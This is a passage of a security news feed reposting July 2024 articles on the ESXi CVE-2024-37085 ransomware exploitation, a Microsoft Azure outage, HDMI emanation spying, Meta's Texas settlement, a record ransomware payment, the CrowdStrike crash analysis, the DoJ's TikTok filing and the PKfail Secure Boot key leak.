	In a blog post published Monday, Microsoft detailed the VMware ESXi medium severity authentication bypass vulnerability tracked as CVE-2024-37085, and confirmed it's under active exploitation by ransomware gangs. Microsoft credited its researchers Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto, Charles-Edouard Bettan and Vaibhav Deshmukh for discovering the vulnerability.
</p>

<p>
	 
</p>

<p>
	Exploitation could allow attackers with sufficient Windows Active Directory permissions to gain full access to an ESXi hypervisor host. Microsoft warned that attacks could affect critical network servers.
</p>

<p>
	 
</p>

<p>
	Microsoft researchers observed several ransomware operators -- including ones it tracks as Storm-0506, Storm-1175 and Octo Tempest -- leveraging the flaw to deploy Black Basta and Akira ransomware.
</p>

<p>
	 
</p>

<p>
	"Over the last year, we have seen ransomware actors targeting ESXi hypervisors to facilitate mass encryption impact in few clicks, demonstrating that ransomware operators are constantly innovating their attack techniques to increase impact on the organizations they target," Microsoft wrote in the blog.
</p>

<p>
	 
</p>

<p>
	Researchers discovered the flaw while investigating "numerous attacks" conducted by ransomware operators Microsoft tracks as Storm-0506, Storm-1175, Octo Tempest and Manatee Tempest that involved ESXi hypervisor. Attack analysis revealed the threat actors leveraged an ESXi vulnerability to elevate their privileges to full administrative access on the ESXi hypervisor.
</p>

<p>
	 
</p>

<p>
	"Further analysis of the vulnerability revealed that VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named 'ESX Admins' to have full administrative access by default. This group is not a built-in group in Active Directory and does not exist by default," the blog said.
</p>

<p>
	 
</p>

<p>
	The researchers then discovered three ways attackers could exploit CVE-2024-37085. Microsoft warned that the first method, which involves adding an "ESX Admins" group and a user to the domain, is currently the only one being actively exploited by the ransomware groups.
</p>

<p>
	 
</p>

<p>
	Researchers reported the flaws to VMware earlier this year, according to the blog.
</p>

<p>
	 
</p>

<p>
	"ESXi is a popular product in many corporate networks, and in recent years, we have observed ESXi hypervisors become a favored target for threat actors," the blog said.
</p>

<p>
	 
</p>

<p>
	Microsoft added that ESXi is a popular target for attackers because hypervisors have limited security product options and pose visibility challenges for Security Operations Center teams.
</p>

<p>
	 
</p>

<p>
	Microsoft stressed that its incident response engagements involving ESXi hypervisors more than doubled over the last three years. It's particularly dangerous when ransomware is involved.
</p>

<p>
	 
</p>

<p>
	Last year, Mandiant warned that a Chinese advanced persistent threat group it tracks as UNC3886 was exploiting an ESXi zero-day vulnerability. Just prior to that, attackers exploited a two-year-old ESXi vulnerability in a widespread ransomware campaign dubbed "ESXiArgs." The attacks highlighted enterprises' hypervisor patching struggles, which could pose a problem with CVE-2024-37085.
</p>

<p>
	 
</p>

<p>
	Microsoft said it observed Storm-0506 deploy Black Basta ransomware then exploit CVE-2024-37085 against an unnamed engineering firm earlier this year. The full attack scope and patching rates remain unknown.
</p>

<p>
	 
</p>

<p>
	"Microsoft observed that the threat actor created the 'ESX Admins' group in the domain and added a new user account to it. Following these actions, Microsoft observed that this attack resulted in encrypting of the ESXi file system and losing functionality of the hosted virtual machines on the ESXi hypervisor," the blog said.
</p>

<p>
	 
</p>

<p>
	In addition to applying VMware's fix for CVE-2024-37085, Microsoft recommended that enterprises implement MFA, isolate privileged accounts from productivity accounts and improve the security posture of their critical assets.
</p>

<p>
	 
</p>

<p>
	TechTarget Editorial contacted Broadcom regarding the attack scope and patching rates. Broadcom provided the following statement:
</p>

<p>
	 
</p>

<p>
	"On July 29, 2024, Microsoft reported on the use of a known vulnerability in VMware ESXi by ransomware actors who had obtained access to a victim's network through unrelated means. This medium-severity ESXi vulnerability, cataloged as CVE-2024-37085, was discovered by Microsoft earlier this year and responsibly reported to Broadcom. We promptly fixed the issue in a software update to ESXi 8.x and published a security advisory that explained how to change settings in earlier versions of ESXi to mitigate the threat. Customers who have not yet updated ESXi or followed the published guidance are vulnerable to this authentication-bypass risk once a malicious actor has obtained unauthorized Active Directory privileges. For more information on Broadcom's recommendations for VMware product hardening, please visit the VMware Cloud Foundation Security Enablement website."
</p>

<p>
	 
</p>

<p>
	Microsoft provided the following statement to TechTarget Editorial: "Ransomware poses a major, high-severity threat being leveraged by threat actors across the landscape. Organizations should be aware that exploiting this vulnerability could lead to ransomware attacks or other malicious activities.
</p>

<p>
	 
</p>

<p>
	"Microsoft frequently collaborates with other software vendors and partners to ensure coordinated responsible disclosure. VMWare is one of those partners, and this vulnerability was responsibly disclosed, coordinated and finally released and assigned a CVE ID in June 2024."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.techtarget.com/searchsecurity/news/366599377/Microsoft-Ransomware-gangs-exploiting-VMware-ESXi-flaw" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24540</guid><pubDate>Tue, 30 Jul 2024 18:14:16 +0000</pubDate></item><item><title>Microsoft hit by global outage of some Azure and Office cloud services</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-hit-by-global-outage-of-some-azure-and-office-cloud-services-r24537/</link><description><![CDATA[<p>
	<span style="font-size:20px;">Nothing to do with CrowdStrike this time</span>
</p>

<p>
	 
</p>

<p>
	Microsoft is experiencing a significant global outage of its cloud and Office services.
</p>

<p>
	 
</p>

<p>
	“We are investigating reports of issues connecting to Microsoft services globally,” the company said.
</p>

<p>
	 
</p>

<p>
	The issue is not affecting all users, but it does affect a large subset of them.
</p>

<p>
	 
</p>

<p>
	Along with Azure services and the Azure Portal, Microsoft 365 services and features, including Outlook, Word, and Excel, are affected.
</p>

<p>
	 
</p>

<p>
	"We have implemented networking configuration changes and have performed failovers to alternate networking paths to provide relief," Microsoft said in an update.
</p>

<p>
	 
</p>

<p>
	"Monitoring telemetry shows improvement in service availability, and we are continuing to monitor to ensure full recovery."
</p>

<p>
	 
</p>

<p>
	The outage comes less than two weeks after an Azure outage and a separate CrowdStrike-caused outage of millions of Windows systems.
</p>

<p>
	 
</p>

<p>
	The latter issue caused flights to be canceled, hospital appointments to be pushed back, and retailers to shut.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.datacenterdynamics.com/en/news/microsoft-hit-by-global-outage-of-some-azure-and-office-cloud-services/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24537</guid><pubDate>Tue, 30 Jul 2024 18:01:57 +0000</pubDate></item><item><title>Hackers can wirelessly watch your screen via HDMI radiation</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-can-wirelessly-watch-your-screen-via-hdmi-radiation-r24536/</link><description><![CDATA[<p>
	<span style="color:#7f8c8d;"><span style="font-size:20px;"><strong>A newly-discovered technique combines wireless EM monitoring and AI algorithms to "read" text on a victim's screen, and it's already being used in the wild. </strong></span></span>
</p>

<p>
	 
</p>

<p>
	Covertly intercepting video signals is a very old-fashioned way to go about electronic spying, but a new method discovered by researchers puts a frightening spin on it.
</p>

<p>
	 
</p>

<p>
	A research team out of Uruguay has found that it’s possible to intercept the wireless electromagnetic radiation coming from an HDMI cable and interpret the video by processing it with AI. Three scientists from the University of the Republic in Montevideo published their findings on Cornell’s ArXiv service, spotted by Techspot.
</p>

<p>
	 
</p>

<p>
	According to the paper, it’s possible to train an AI model to interpret the tiny fluctuations in electromagnetic energy from the wired HDMI signal. Even though it’s a wired standard and it’s usually encrypted digitally, there’s enough electromagnetic signal coming off of these cables to detect without direct access.
</p>

<p>
	 
</p>

<p>
	Detecting and decoding are two different things, of course. But the researchers also found that using an AI model paired to text recognition software, it’s possible to “read” the wirelessly recorded EM radiation with up to 70 percent accuracy.
</p>

<p>
	 
</p>

<p>
	Though that’s a long way from a conventional recording, it’s still a 60 percent improvement over previous methods—and it’s more than enough to steal passwords and other sensitive information. It’s even possible to do wirelessly without physical access to a target computer, even from the outside of a building under ideal conditions.
</p>

<p>
	 
</p>

<p>
	Skimming off wireless electromagnetic signals for surveillance isn’t a new idea. It’s a vulnerability referred to as TEMPEST (Transient ElectroMagnetic Pulse Emanation STandard, a very awkward backronym) with roots in espionage going all the way back to World War II. But as a digital transmission with at least some level of encryption using the HDCP system, HDMI cables weren’t thought to be particularly susceptible to it. The researchers’ AI algorithm-assisted method of attack (which they’re calling “Deep-TEMPEST”) opens up some very disturbing possibilities.
</p>

<p>
	 
</p>

<p>
	The researchers claim that this system, or functionally identical alternatives, are already being used by state-level spies and industrial espionage agents. The sophisticated nature of the technique and the need to be at least somewhere in the vicinity of the target system means that it’s unlikely to affect regular users. But any government agency or large company with sensitive data should be wary and might want to look into EM-shielding measures—and that goes double for any of their employees who work from home.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcworld.com/article/2413156/hackers-can-wirelessly-watch-your-screen-via-hdmi-radiation.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24536</guid><pubDate>Tue, 30 Jul 2024 17:57:48 +0000</pubDate></item><item><title>Meta to pay $1.4 billion to settle Texas facial recognition data lawsuit</title><link>https://nsaneforums.com/news/security-privacy-news/meta-to-pay-14-billion-to-settle-texas-facial-recognition-data-lawsuit-r24535/</link><description><![CDATA[<p>
	July 30 (Reuters) - Meta Platforms has agreed to pay $1.4 billion to Texas to resolve the state’s lawsuit accusing the Facebook parent of illegally using facial-recognition technology to collect biometric data of millions of Texans without their consent.
</p>

<p>
	<br />
	The terms of the settlement, disclosed on Tuesday, mark the largest accord ever by any single state, according to the lawyers for Texas, whose legal team included the plaintiffs firm Keller Postman.
</p>

<p>
	<br />
	The lawsuit, filed in 2022, was the first major case to be brought under Texas' 2009 biometric privacy law, according to law firms tracking the litigation. A provision of the law provides damages of up to $25,000 per violation.
</p>

<p>
	<br />
	Texas accused Facebook of capturing biometric information "billions of times" from photos and videos that users uploaded to the social media platform as part of a free, discontinued feature called "Tag Suggestions."
</p>

<p>
	<br />
	A spokesperson for Meta said the company is pleased to resolve the matter and looks forward to "exploring future opportunities to deepen our business investments in Texas, including potentially developing data centers."
</p>

<p>
	<br />
	It has continued to deny any wrongdoing.
</p>

<p>
	<br />
	Texas Attorney General Ken Paxton in a statement said the settlement marks the state’s "commitment to standing up to the world’s biggest technology companies and holding them accountable for breaking the law and violating Texans’ privacy rights."
</p>

<p>
	<br />
	Texas and Meta said they reached an accord in May, weeks before the start of a trial in state court was scheduled to begin.
</p>

<p>
	<br />
	Meta separately agreed to pay $650 million in 2020 to settle a biometric privacy class action that was brought under an Illinois privacy law that is considered one of the nation's most stringent. The company also denied wrongdoing.
</p>

<p>
	<br />
	Alphabet’s Google separately is fighting a lawsuit by Texas accusing the company of violating the state’s biometric law.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.reuters.com/technology/cybersecurity/meta-platforms-pay-14-bln-settle-texas-lawsuit-over-facial-recognition-data-2024-07-30/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24535</guid><pubDate>Tue, 30 Jul 2024 17:29:25 +0000</pubDate></item><item><title>'Fortune 50' Company Made Record-Breaking $75M Ransomware Payment</title><link>https://nsaneforums.com/news/security-privacy-news/fortune-50-company-made-record-breaking-75m-ransomware-payment-r24531/</link><description><![CDATA[<p>
	<span style="font-size:18px;">The payment was sent to a lesser known ransomware group called Dark Angels, according to cybersecurity vendor Zscaler, topping the $40 million paid by CNA in 2021.</span>
</p>

<p>
	 
</p>

<p>
	A major company made a staggering $75 million ransomware payment to hackers earlier this year, according to cybersecurity vendor Zscaler.
</p>

<p>
	 
</p>

<p>
	Zscaler made the claim in a Tuesday report examining the latest trends in ransomware attacks, which continue to ensnare companies, hospitals, and schools across the country.
</p>

<p>
	 
</p>

<p>
	In a tweet, Zscaler said the unnamed “Fortune 50 company” made the $75 million payment to a lesser known ransomware group called Dark Angels. “The payment is the single largest ransomware-related transaction ever reported,” the cybersecurity vendor added.
</p>

<p>
	 
</p>

<p>
	Chainalysis, a cryptocurrency tracking firm, also confirmed to PCMag that it spotted the $75 million payment to Dark Angels.
</p>

<p>
	 
</p>

<p>
	The previous ransomware payment record belonged to insurance provider CNA, which reportedly paid $40 million to a hacking group known as Phoenix in 2021.
</p>

<p>
	 
</p>

<p>
	Compared to other ransomware groups, Dark Angels stands out by usually focusing on a "single large company at a time,” and demanding a high sum, Zscaler says. “This is in stark contrast to most ransomware groups, which target victims indiscriminately and outsource most of the attack to affiliate networks."
</p>

<p>
	 
</p>

<p>
	As an example, Zscaler said it tracked Dark Angels in September 2023 breaching an “international conglomerate that provides solutions for building automation systems, among other services.” Dark Angels stole 27TB of corporate information while encrypting the company’s VMware ESXi virtual machines. The group then demanded a $51 million ransom.
</p>

<p>
	 
</p>

<p>
	“The Dark Angels ransomware group’s strategy of targeting a small number of high-value companies for large payouts is a trend worth monitoring,” according to Zscaler, which says its "ThreatLabz predicts that other ransomware groups will take note of Dark Angels’ success and may adopt similar tactics.”
</p>

<p>
	 
</p>

<p>
	The US remains a top target for ransomware hackers. The number of ransomware attacks in the country so far this year has doubled to 1,821, up from 902 in 2023. The company published the findings as others, such as Chainalysis, report that the ransomware scourge continues to grow, despite law enforcement efforts to crack down.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/fortune-50-company-made-record-breaking-75m-ransomware-payment" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24531</guid><pubDate>Tue, 30 Jul 2024 16:56:41 +0000</pubDate></item><item><title>Microsoft offers advice on avoiding another CrowdStrike-style outage</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-offers-advice-on-avoiding-another-crowdstrike-style-outage-r24507/</link><description><![CDATA[<p>
	<span style="color:#3498db;"><span style="font-size:22px;"><strong>Vendors should minimise use of kernel mode, customers should make full use of integrated Windows security features </strong></span></span>
</p>

<p>
	 
</p>

<p>
	In a blog post published on Friday, David Weston, vice president, enterprise and OS security at Microsoft, outlined the causes of the global incident which saw millions of devices running CrowdStrike Falcon on Windows crash.
</p>

<p>
	 
</p>

<p>
	According to Microsoft's kernel-crash dump analyses, the root cause of the outage was a memory safety issue, specifically a read out-of-bounds access violation in CrowdStrike's CSagent.sys driver, a module designed to detect suspicious activity.
</p>

<p>
	 
</p>

<p>
	CSagent.sys is a file system filter driver operating at kernel level that receives notifications about file operations, such as creation or modification.
</p>

<p>
	 
</p>

<p>
	File system filters are also commonly used by security solutions to monitor the behaviour of the system.
</p>

<p>
	 
</p>

<p>
	The fateful CrowdStrike update contained a change to the sensor that allowed the filter driver to be called when file-based activity was detected. This was intended to enhance malware detection capabilities. However, the faulty update caused it to try to access a memory address for which it did not have permissions, and Falcon was unable to handle the error gracefully, causing the Windows kernel to crash and enter a bootloop.
</p>

<p>
	 
</p>

<p>
	Microsoft's analysis of the cause of the crash concurs with CrowdStrike's preliminary review, released last week.
</p>

<p>
	 
</p>

<p>
	CrowdStrike Falcon loads four modules into the Windows kernel. A question on the lips of many security professionals and admins tasked with cleaning up the mess is why that is necessary at all. Why could they not run in user mode, where any glitches would be far less damaging?
</p>

<p>
	 
</p>

<p>
	They also wondered whether Microsoft's security checks might be at fault.
</p>

<p>
	 
</p>

<p>
	The main reasons for running drivers in kernel mode are twofold, according to Weston.
</p>

<p>
	 
</p>

<p>
	First, it allows security vendors to monitor what's happening in the core of the operating system itself: "Kernel drivers allow for system wide visibility, and the capability to load in early boot to detect threats like boot kits and root kits which can load before user-mode applications," he wrote.
</p>

<p>
	 
</p>

<p>
	Second, it provides for tamper resistance: "Security products want to ensure that their software cannot be disabled by malware, targeted attacks, or malicious insiders, even when those attackers have admin-level privileges."
</p>

<p>
	 
</p>

<p>
	CrowdStrike has taken full responsibility for the error, which took down more than 8.5 million Windows devices, saying it was due to a bug in its Content Validator, the system that is supposed to detect faulty code in an update.
</p>

<p>
	 
</p>

<p>
	However, the incident does put a question mark over whether operating systems that allow third-party software to run in kernel mode should have more stringent checks in place.
</p>

<p>
	 
</p>

<p>
	Microsoft's blog does not address this directly. It says it engages with third-party security vendors through the Microsoft Virus Initiative (MVI) to share data and best practices, and that it provides runtime protection, such as PatchGuard, to prevent disruptive behaviour from kernel drivers.
</p>

<p>
	 
</p>

<p>
	In addition, drivers must pass a series of tests by Microsoft Windows Hardware Quality Labs (WHQL) to be certified - although this does not cover updates.
</p>

<p>
	 
</p>

<p>
	In his blog post, Weston advised security software vendors to minimise their use of sensors in kernel mode for data collection and enforcement, and to isolate the majority of key product functionality in user mode, where additional protections such as Virtualisation-based Security (VBS) Enclaves, Protected Processes and Event Tracing for Windows (ETW) are available.
</p>

<p>
	 
</p>

<p>
	Customers are advised to make use of security features integrated into Windows.
</p>

<p>
	 
</p>

<p>
	"Windows is constantly increasing security defaults, including dozens of new security features enabled by default in Windows 11," Weston wrote.
</p>

<p>
	 
</p>

<p>
	He added that Microsoft plans to work with third-party security software vendors to help them take advantage of these integrated features.
</p>

<p>
	 
</p>

<p>
	CrowdStrike is used predominantly by large corporations and public sector organisations. It is estimated that the global CrowdStrike outage will cost Fortune 500 companies around $44 million each, on average.
</p>

<p>
	 
</p>

<p>
	However, a CISO told Computing that the company is "the best at what it does," and predicted its long-term survival, in spite of causing the largest IT outage in history.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.computing.co.uk/news/4340656/microsoft-offers-advice-avoiding-crowdstrike-style-outage" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24507</guid><pubDate>Mon, 29 Jul 2024 17:05:35 +0000</pubDate></item><item><title>Microsoft admits 8.5 million CrowdStruck machines estimate was lowballed</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-admits-85-million-crowdstruck-machines-estimate-was-lowballed-r24505/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Promises to discourage use of kernel drivers – so they don't crash the world again</span>
</p>

<p>
	 
</p>

<p>
	Microsoft has admitted that its estimate of 8.5 million machines crashed by CrowdStrike's faulty software update was almost certainly too low, and vowed to reduce infosec vendors' reliance on the kernel drivers at the heart of the issue.
</p>

<p>
	 
</p>

<p>
	Redmond posted an incident response blog on Saturday – titled "Windows Security best practices for integrating and managing security tools" – in which veep for enterprise and OS security David Weston explained how Microsoft measured the impact of the incident: by accessing crash reports shared by customers.
</p>

<p>
	 
</p>

<p>
	But of course, as Weston noted, not every Windows customer shares crash reports.
</p>

<p>
	 
</p>

<p>
	"It's worth noting the number of devices which generated crash reports is a subset of the number of impacted devices previously shared by Microsoft," he wrote. Which means the 8.5 million crashed machine estimate Redmond shared on July 20 for over a week was not entirely accurate. It was also advantageous to Microsoft, which was criticized for the fragility of its OS in the wake of the incident – especially in mainstream media, which often identified crashes caused by CrowdStrike as a Microsoft mess.
</p>

<p>
	 
</p>

<p>
	Weston's post justifies how Windows performed, on the grounds that kernel drivers like those employed by CrowdStrike can improve performance and prevent tampering with software in ways that enhance security.
</p>

<p>
	 
</p>

<p>
	He noted, however, that infosec vendors must rationalize those benefits against potential negative impacts on resilience.
</p>

<p>
	 
</p>

<p>
	"Since kernel drivers run at the most trusted level of Windows, where containment and recovery capabilities are by nature constrained, security vendors must carefully balance needs like visibility and tamper resistance with the risk of operating within kernel mode," he wrote.
</p>

<p>
	 
</p>

<p>
	Weston observed that security vendors can find the right balance.
</p>

<p>
	 
</p>

<p>
	"For example, security vendors can use minimal sensors that run in kernel mode for data collection and enforcement, limiting exposure to availability issues," he wrote. "The remainder of the key product functionality includes managing updates, parsing content, and other operations can occur isolated within user mode where recoverability is possible."
</p>

<p>
	 
</p>

<p>
	That arrangement, he suggested, "demonstrates the best practice of minimizing kernel usage while still maintaining a robust security posture and strong visibility."
</p>

<p>
	 
</p>

<p>
	Are you taking notes, CrowdStrike?
</p>

<p>
	 
</p>

<p>
	Weston also reminded readers that Redmond runs an industry forum called the Microsoft Virus Initiative (MVI) in which security vendors and the OS giant work together to "define reliable extension points and platform improvements, as well as share information about how to best protect our customers."
</p>

<p>
	 
</p>

<p>
	The Microsoft veep listed the many security-related enhancements Microsoft has made over the years, and revealed the software megalith now plans "to work with the anti-malware ecosystem to take advantage of these integrated features to modernize their approach, helping to support and even increase security along with reliability."
</p>

<p>
	 
</p>

<p>
	That work will involve four efforts, namely:
</p>

<p>
	 
</p>

<ol>
	<li>
		Providing safe rollout guidance, best practices, and technologies to make it safer to perform updates to security products;
	</li>
	<li>
		Reducing the need for kernel drivers to access important security data;
	</li>
	<li>
		Providing enhanced isolation and anti-tampering capabilities with technologies like recently announced VBS enclaves;
	</li>
	<li>
		Enabling zero trust approaches like high integrity attestation which provides a method to determine the security state of the machine based on the health of Windows native security features.
	</li>
</ol>

<p>
	 
</p>

<p>
	Point two seems aimed at ensuring a CrowdStrike-like event becomes less likely in future.
</p>

<p>
	 
</p>

<p>
	Weston didn't explain how that reduced dependence will be delivered – some re-jigging of Windows will likely be needed to make it happen.
</p>

<p>
	 
</p>

<p>
	Microsoft and Windows have a long and inglorious history of security snafus. If Redmond's changes go awry, it won't have CrowdStrike to blame for any new problems. ®
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.theregister.com/2024/07/29/microsoft_crowdstrike_incident_report/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24505</guid><pubDate>Mon, 29 Jul 2024 16:57:53 +0000</pubDate></item><item><title>US claims TikTok shipped personal data to China &#x2013; very personal data</title><link>https://nsaneforums.com/news/security-privacy-news/us-claims-tiktok-shipped-personal-data-to-china-%E2%80%93-very-personal-data-r24504/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Not even Oracle could stop it, claims DoJ</span>
</p>

<p>
	 
</p>

<p>
	The US Department of Justice has alleged that TikTok shipped personal information to China and allowed profiling of the short video app's users based on their attitudes to some ticklish topics.
</p>

<p>
	 
</p>

<p>
	The Department's views emerged in a filing [PDF] from the US government in response to attempts by TikTok and its parent company ByteDance to strike down laws that force a sale of the platform's stateside operations – and closure if that can't be arranged.
</p>

<p>
	 
</p>

<p>
	The filing details an internal tool called Lark that TikTok staff use for internal communications. The DoJ alleges "significant amounts of restricted US user data (including but not limited to personally identifiable information)" was shared over Lark.
</p>

<p>
	 
</p>

<p>
	"This resulted in certain sensitive US person data being contained in Lark channels and, therefore, stored on Chinese servers and accessible to ByteDance employees located in China," the filing asserts.
</p>

<p>
	 
</p>

<p>
	It gets worse: the filing claims "Lark contained multiple internal search tools that had been developed and run by China-based ByteDance engineers for scraping TikTok user data, including US user data."
</p>

<p>
	 
</p>

<p>
	Those tools allowed collection of "bulk user information based on the user's content or expressions, including views on gun control, abortion, and religion." The results of those efforts could be viewed in China.
</p>

<p>
	 
</p>

<p>
	The filing also alleges that TikTok tools allow for "triggering of the suppression of content on the platform based on the user's use of certain words. Although this tool contained certain policies that only applied to users based in China, others such policies may have been used to apply to TikTok users outside of China."
</p>

<p>
	 
</p>

<p>
	It's not hard to imagine how that tool could suppress anti-Beijing comment, or, in concert with the profiling tool, help to target campaigns to interested audiences.
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>The Oracle angle</strong></span>
</p>

<p>
	 
</p>

<p>
	The filing also makes many mentions of Oracle and the database giant's efforts to become ByteDance's US-based technology partner under a "national security agreement" (NSA) that would ideally have TikTok operate under strict conditions. Big Red offered to segment TikTok data so it could identify matter describing US-based users, segment it, and store it stateside.
</p>

<p>
	 
</p>

<p>
	The filing states that the US government didn't find that offer adequate, as it "contemplated extensive data flows of US users back to ByteDance and thus to China and because the agreement sought to maintain extensive engagement between TikTok's US operations and the leadership at ByteDance."
</p>

<p>
	 
</p>

<p>
	A potential role for Oracle as an overseer of TikTok's source code was also rejected, on grounds that the sheer volume of the codebase – two billion lines as of 2022 – meant that a review would require at least three years of work on the code used at that time.
</p>

<p>
	 
</p>

<p>
	"But the source code is not static," the filing states. "ByteDance regularly updates it to add and modify TikTok's features. Even with Oracle's considerable resources, perfect review would be an impossibility."
</p>

<p>
	 
</p>

<p>
	The filing contains details that suggest Oracle may have been better off not getting the gig as TikTok's stateside host, observing that Big Red "would be required to sift through such data, using both untested and experimental tools to try to ascertain whether information was routed for legitimate commercial reasons or nefarious reasons at the request of PRC actors."
</p>

<p>
	 
</p>

<p>
	The DoJ asserted that Oracle, and other tech providers, just couldn't ever know if they had enough info to do the job right.
</p>

<p>
	 
</p>

<p>
	"Private parties also lack insight into ByteDance's communications with PRC officials, ByteDance's use of US user data, and ByteDance's other TikTok-related activities," the filing argues. US authorities thus "determined that the Final Proposed NSA presented too great a risk because the trusted technology provider and other monitors faced massive scope and scale hurdles that could not be overcome."
</p>

<p>
	 
</p>

<p>
	The arguments outlined above will be heard in court on September 16, as may even juicier allegations, since substantial chunks of the filing are redacted.
</p>

<p>
	 
</p>

<p>
	TikTok used its X account to reject the US action against it.
</p>

<p>
	 
</p>

<p>
	"Nothing in this brief changes the fact that the Constitution is on our side," the outfit Xeeted. "Today, once again, the government is taking this unprecedented step while hiding behind secret information. We remain confident we will prevail in court." ®
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.theregister.com/2024/07/29/doj_tiktok_filing_china_data/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24504</guid><pubDate>Mon, 29 Jul 2024 16:49:14 +0000</pubDate></item><item><title>Secure Boot useless on hundreds of PCs from major vendors after key leak</title><link>https://nsaneforums.com/news/security-privacy-news/secure-boot-useless-on-hundreds-of-pcs-from-major-vendors-after-key-leak-r24503/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Plus: More stalkerware exposure; a $16M TracFone fine; Ransomware victims don't use MFA, and more</span>
</p>

<p>
	 
</p>

<p>
	<span style="color:#c0392b;">Infosec in brief</span> Protecting computers' BIOS and the boot process is essential for modern security – but knowing it's important isn't the same as actually taking steps to do it.
</p>

<p>
	 
</p>

<p>
	For instance, take the research published last week by security boffins at firmware security vendor Binarly. The researchers found hundreds of PCs sold by Dell, Acer, Fujitsu, Gigabyte, HP, Lenovo and Supermicro – and components sold by Intel – using what appears to be a 12-year-old test platform key (PK) leaked in 2022 to protect their UEFI Secure Boot implementations.
</p>

<p>
	 
</p>

<p>
	"An attacker with access to the private part of the PK can easily bypass Secure Boot by manipulating the Key Exchange Key database, the Signature Database, and the Forbidden Signature Database," Binarly's boffins wrote.
</p>

<p>
	 
</p>

<p>
	And it's not like the manufacturers using the offending PK didn't have reason to know it was untrusted and not intended for use outside the lab: It said so right on the package.
</p>

<p>
	 
</p>

<p>
	"These test keys have strong indications of being untrusted," Binarly noted. "For example, the certificate issuer contains the 'DO NOT TRUST' or 'DO NOT SHIP' strings."
</p>

<p>
	 
</p>

<p>
	According to Binarly, more than ten percent of the firmware images in its dataset are vulnerable to exploitation with the untrusted PK – which was issued by American Megatrends International, possibly as early as May 2012. The researchers observed that this makes the issue "one of the longest-lasting [supply chain vulnerabilities] of its kind."
</p>

<p>
	 
</p>

<p>
	If an attacker were to leverage the PK in an attack, they could run untrusted code during the boot process, even with Secure Boot enabled.
</p>

<p>
	 
</p>

<p>
	"This compromises the entire security chain, from firmware to the operating system," Binarly added.
</p>

<p>
	 
</p>

<p>
	Binarly has released a free scanning tool to check systems for vulnerability to what it calls "PKfail". Running it seems a sensible action. As for fixing this issue, device manufacturers will need to step up.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:18px;"><strong>Another stalkerware vendor breached</strong></span>
</p>

<p>
	 
</p>

<p>
	It seems we can barely go two weeks without another stalkerware vendor being breached, but here we are. TechCrunch was handed a bunch of files stolen from Minnesota-based SpyTech last week.
</p>

<p>
	 
</p>

<p>
	The files – which were reportedly verified as authentic – came from phones, tablets and computers monitored by SpyTech software, which covertly monitors machines to snoop on what their users are doing. Data belonging to more than 10,000 devices was found, going back to 2013.
</p>

<p>
	 
</p>

<p>
	Funnily enough, the CEO of SpyTech reportedly wasn't aware of the breach when asked about it – which just goes to show you these shops are more about making money than protecting the private data they scoop up on behalf of customers.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>… And turn on MFA while you're at it</strong></span>
</p>

<p>
	 
</p>

<p>
	Security researchers at Cisco Talos released their quarterly report on incident response trends last week, and one startling trend stands out: Around 80 percent of ransomware engagements in Q2 occurred at organizations whose systems didn't employ multifactor authentication.
</p>

<p>
	 
</p>

<p>
	And here we thought Snowflake might have taught the world something.
</p>

<p>
	 
</p>

<p>
	Compromised credentials have been the most popular way of gaining initial access for the third quarter in a row, Talos noted – just like what caused all those Snowflake failures.
</p>

<p>
	 
</p>

<p>
	Ransomware engagements as a whole were up 22 percent from the first to second quarter, accounting for 30 percent of all incidents to which Talos responded. Combined with the rise in attacks using stolen credentials and relying on a lack of MFA, maybe it'd be a good idea to spend some time this week enabling it for everyone – no exceptions.
</p>

<p>
	<br />
	<span style="font-size:18px;"><strong>TracFone fined $16 million for trio of breaches</strong></span>
</p>

<p>
	 
</p>

<p>
	Verizon subsidiary TracFone has agreed to pay the FCC $16 million to end investigations into a trio of data breaches the outfit experienced between 2021 and 2023.
</p>

<p>
	 
</p>

<p>
	According to the FCC, TracFone failed to secure several of its customer database APIs, resulting in criminals stealing customer account and device information, as well as personally identifiable info. The breaches resulted in "numerous unauthorized port-outs."
</p>

<p>
	 
</p>

<p>
	Not to be confused with SIM swaps – another scam most carriers are abysmal at preventing – port-outs involve transferring a number to a different carrier entirely. Both give attackers control over customer phone numbers.
</p>

<p>
	 
</p>

<p>
	TracFone has been ordered to implement mandatory cyber security programs "with novel provisions to reduce API vulnerabilities," as well as SIM swap and port-out protections. ®
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.theregister.com/2024/07/29/infosec_roundup/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24503</guid><pubDate>Mon, 29 Jul 2024 16:45:34 +0000</pubDate></item><item><title>Google apologizes after 15 million Chrome users lost access to their passwords</title><link>https://nsaneforums.com/news/security-privacy-news/google-apologizes-after-15-million-chrome-users-lost-access-to-their-passwords-r24502/</link><description><![CDATA[<p>
